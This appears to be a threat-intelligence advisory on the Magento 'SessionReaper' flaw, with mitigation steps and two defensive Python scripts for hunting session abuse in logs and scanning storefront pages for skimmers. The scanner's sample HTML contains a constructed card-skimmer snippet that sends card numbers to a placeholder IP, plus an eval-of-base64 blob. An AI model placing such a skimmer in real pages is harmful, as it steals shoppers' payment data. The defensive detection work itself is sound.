Magento SessionReaper Exploit Targets Thousands of E-Commerce Sites
A remote code execution vulnerability dubbed 'SessionReaper' (CVE-2025-54236) in Magento Open Source and Adobe Commerce lets attackers hijack live customer sessions and, in some configurations, take full control of the server. The root cause involves unsafe handling of serialized session data and improper input validation in session-related endpoints. Once a proof-of-concept was published, attackers weaponized the flaw within hours; researchers reported hundreds of attacks against stores within 24 hours and estimated that a large share of merchants remained unpatched. The practical impact ranges from customer account takeover and payment card skimming to full-site compromise and data exfiltration. Adobe released a patch shortly after disclosure, but the high rate of unpatched instances combined with public exploit code makes this an active exploitation scenario rather than a theoretical risk.
CORTEX Protocol Intelligence Assessment
Business Impact: Critical for online retailers: exposure of customer payment data and PII, plus brand and revenue impact. Technical Context: Unsafe deserialization of session objects facilitates authentication bypass and remote command execution.
Strategic Intelligence Guidance
- Apply Adobe's patch for Magento Open Source/Adobe Commerce immediately; until it is applied, treat the store as exposed. Verify the integrity of backups before relying on them for recovery, since a backup taken after compromise preserves the attacker's changes.
- Deploy WAF rules targeting session-related endpoints and alert on abnormal session creation: bursts of new sessions issued to a single source, and session IDs presented from an IP other than the one they were issued to.
- Scan storefront and checkout pages for injected skimmer scripts (unexpected inline scripts, scripts loaded from hosts outside the store's allowlist) and validate payment flows end to end.
- Rotate admin and API credentials, invalidate existing sessions after patching, and enforce least privilege for store-management roles.
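The two session signals named in the guidance above, hunted over web server logs, as an added example that is not part of the Malwarebytes report or of any Magento tooling. It assumes a custom nginx log_format (the standard combined format followed by the client's `$cookie_PHPSESSID` and the server's `$sent_http_set_cookie`); the log lines, thresholds and the name `PHPSESSID` for the frontend session cookie are constructed for the example, and the REST path shown is just ordinary cart traffic, not an exploit request.

```python
"""Hunt for session-creation bursts and cross-IP session reuse in web server logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SESSION_COOKIE = "PHPSESSID"  # assumed frontend session cookie name

# Assumed custom nginx log_format (not a Magento default): combined format, then
# "$cookie_PHPSESSID" (session presented by the client) and
# "$sent_http_set_cookie" (session issued by the server).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" '
    r'"(?P<req_sess>[^"]*)" "(?P<set_cookie>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one real shopper, then a scripted client that is issued
# five fresh sessions in twelve seconds and later presents the shopper's session id.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Oct/2025:10:00:01 +0000] "GET /customer/account/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-" "PHPSESSID=sess_cust1; path=/; HttpOnly"
203.0.113.10 - - [22/Oct/2025:10:00:30 +0000] "GET /checkout/ HTTP/1.1" 200 8800 "-" "Mozilla/5.0" "sess_cust1" "-"
198.51.100.7 - - [22/Oct/2025:10:05:00 +0000] "POST /rest/V1/guest-carts HTTP/1.1" 200 40 "-" "python-requests/2.32" "-" "PHPSESSID=sess_a1; path=/; HttpOnly"
198.51.100.7 - - [22/Oct/2025:10:05:03 +0000] "POST /rest/V1/guest-carts HTTP/1.1" 200 40 "-" "python-requests/2.32" "-" "PHPSESSID=sess_a2; path=/; HttpOnly"
198.51.100.7 - - [22/Oct/2025:10:05:06 +0000] "POST /rest/V1/guest-carts HTTP/1.1" 200 40 "-" "python-requests/2.32" "-" "PHPSESSID=sess_a3; path=/; HttpOnly"
198.51.100.7 - - [22/Oct/2025:10:05:09 +0000] "POST /rest/V1/guest-carts HTTP/1.1" 200 40 "-" "python-requests/2.32" "-" "PHPSESSID=sess_a4; path=/; HttpOnly"
198.51.100.7 - - [22/Oct/2025:10:05:12 +0000] "POST /rest/V1/guest-carts HTTP/1.1" 200 40 "-" "python-requests/2.32" "-" "PHPSESSID=sess_a5; path=/; HttpOnly"
198.51.100.7 - - [22/Oct/2025:10:06:00 +0000] "GET /customer/account/ HTTP/1.1" 200 5120 "-" "python-requests/2.32" "sess_cust1" "-"
this line is deliberately malformed and must be skipped, not guessed at
"""


def parse_log(text):
    """Parse log text into dict records; lines that do not match are dropped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
        issued = re.search(rf"{SESSION_COOKIE}=([^;]+)", rec["set_cookie"])
        rec["issued_sess"] = issued.group(1) if issued else None
        rec["req_sess"] = None if rec["req_sess"] == "-" else rec["req_sess"]
        records.append(rec)
    return records


def find_session_bursts(records, window=timedelta(seconds=60), threshold=5):
    """Per source IP, the largest number of distinct sessions issued within any
    sliding window of `window`; only IPs that reach `threshold` are returned."""
    issued = defaultdict(list)
    for rec in records:
        if rec["issued_sess"]:
            issued[rec["ip"]].append((rec["ts"], rec["issued_sess"]))
    flagged = {}
    for ip, events in issued.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({sid for _, sid in events[start:end + 1]})
            if distinct >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


def find_shared_sessions(records):
    """Session ids presented from more than one source IP, with the IP the session
    was issued to listed first. A hijacked session looks exactly like this."""
    owners = {}
    users = defaultdict(set)
    for rec in sorted(records, key=lambda r: r["ts"]):
        if rec["issued_sess"]:
            owners.setdefault(rec["issued_sess"], rec["ip"])
        if rec["req_sess"]:
            users[rec["req_sess"]].add(rec["ip"])
    return {sid: sorted(ips, key=lambda ip: ip != owners.get(sid))
            for sid, ips in users.items() if len(ips) > 1}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("session bursts:", find_session_bursts(recs))
    print("sessions seen from several IPs:", find_shared_sessions(recs))
```

The cross-IP check will also fire for legitimate shoppers who change networks mid-session (mobile to Wi-Fi), so treat it as a triage lead to pair with the user agent and the burst result rather than an automatic block; the burst check is the stronger signal, since a browser is issued one session, not five in twelve seconds.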
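A first-pass skimmer scan of a storefront page, covering the third guidance item, as an added example that is not part of the Malwarebytes report or of any Magento tooling. The allowlisted hosts, the heuristic patterns and the sample HTML (including the injected scripts) are constructed for the example; the page would normally be fetched from the live store, and the heuristics are a triage aid, not proof of compromise.

```python
"""Inventory <script> tags on a storefront page and flag likely skimmer traits."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of hosts the store legitimately loads scripts from.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}

# Constructed heuristics for Magecart-style skimmers: references to payment fields
# combined with an exfiltration primitive, or runtime decoding of a long blob.
PAYMENT_HINTS = re.compile(r"card|cvv|cvc|expir|checkout|billing", re.I)
EXFIL_HINTS = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b|\.src\s*=")
ENCODE_HINTS = re.compile(r"\b(atob|unescape|fromCharCode|eval)\b")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")

# Constructed sample page: one allowlisted script, one benign inline script, then
# three injected scripts of the kinds a skimmer campaign leaves behind.
SAMPLE_HTML = """
<html><head>
<script src="https://cdn.shop.example/static/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://cdn-stat.example.net/jquery.min.js"></script>
</head><body>
<form id="checkout"><input id="card_number"></form>
<script>
document.querySelector('#card_number').addEventListener('blur', function () {
  new Image().src = 'https://203.0.113.55/c?d=' + btoa(this.value);
});
</script>
<script>eval(atob('""" + "QUFB" * 30 + """'));</script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._body = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._body = []

    def handle_data(self, data):
        if self._in_script:
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._body)))
            self._in_script = False


def scan_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (reason, evidence) findings for scripts that deserve a human look."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:
            host = urlparse(src).hostname
            if host and host not in allowed_hosts:
                findings.append(("external script from non-allowlisted host", src))
            continue
        if PAYMENT_HINTS.search(body) and EXFIL_HINTS.search(body):
            findings.append(("reads payment fields and sends data out", body.strip()[:60]))
        if ENCODE_HINTS.search(body) and BASE64_BLOB.search(body):
            findings.append(("decodes a long encoded blob at runtime", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for reason, evidence in scan_scripts(SAMPLE_HTML):
        print(f"{reason}: {evidence}")
```

Run it against the rendered checkout page, not just the CMS source, because skimmers are frequently injected from the database or from a compromised static asset and only appear in what the browser receives; a clean diff of the rendered page against a known-good copy is the stronger check once a baseline exists.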
CVEs: CVE-2025-54236
Vendors: Adobe (Magento Open Source, Adobe Commerce)
Threats: SessionReaper
Targets: Magento and Adobe Commerce online stores
Intelligence Source: Thousands of online stores at risk as SessionReaper attacks spread | Malwarebytes | Oct 24, 2025